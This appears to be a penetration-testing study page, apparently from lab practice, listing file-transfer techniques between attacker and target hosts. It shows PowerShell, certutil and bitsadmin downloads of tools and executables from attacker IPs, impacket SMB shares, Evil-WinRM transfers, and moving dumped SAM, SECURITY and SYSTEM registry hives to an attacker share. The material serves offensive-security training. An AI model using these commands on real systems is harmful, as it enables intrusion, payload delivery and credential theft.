Uploading Shells/ Transferring Files

Transfer files with SSH (SCP)

Best to copy to tmp folder as there are no restrictions mostly

scp /opt/LinEnum.sh [email protected]:/tmp

scp [email protected]:/home/ubuntu/documents.txt notes.txt

Python server

python3 -m  http.server

basic http-Server

http-server -p 8080

Powershell downloading files

(new-object System.Net.WebClient).DownloadFile('http://10.9.88.34:8000/SharpHound.ps1', 'C:\Users\Administrator\Downloads\SharpHou
nd.ps1')

from cmd
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.30:9005/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

Certutil cmd windows

certutil -urlcache -f http://10.10.14.29:80/checkmate.exe checkmate.exe

RDP with shared folder to transfer filer - xfreerdp

xfreerdp /u:bob /p:HTB_@cademy_stdnt! /v:10.129.202.99 +clipboard /drive:Home,/home/kali/Downloads

Download files from server to machine in Windows

bitsadmin /transfer myDownloadJob http://192.168.18.144:8000/ammar.txt E:\Study\CEH\ammar.txt

SMB Files tranfer with impacket

start smb server on attacker machine

                                                                                                                                                                       
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-smbserver desktop ~/Downloads -smb2support -username test -password test
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

We can also use it without specifying username and password

ammartiger@htb[/htb]$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

And now you can make aval this share on the windows system as a separate drive

controller\administrator@DOMAIN-CONTROLL C:\>net use z: \\10.9.88.34\desktop /user:test test
The command completed successfully.

And now you can transfer files to and fro from both machines.

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator\Downloads>copy SharpHound.ps1 z: 
        1 file(s) copied.

We can also directly move files without setting it as drive.

C:\> move sam.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move security.save \\10.10.15.16\CompData
        1 file(s) moved.

C:\> move system.save \\10.10.15.16\CompData
        1 file(s) moved.

Evil-winrm

You can use upload and download command to transfer files

Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20230730011352_BloodHound.zip
                                        
Info: Downloading C:\Users\svc-alfresco\Documents\20230730011352_BloodHound.zip to 20230730011352_BloodHound.zip
                                        
Info: Download successful!

Other web servers complete list

PreviousShells NextFootPrinting

Last updated 4 months ago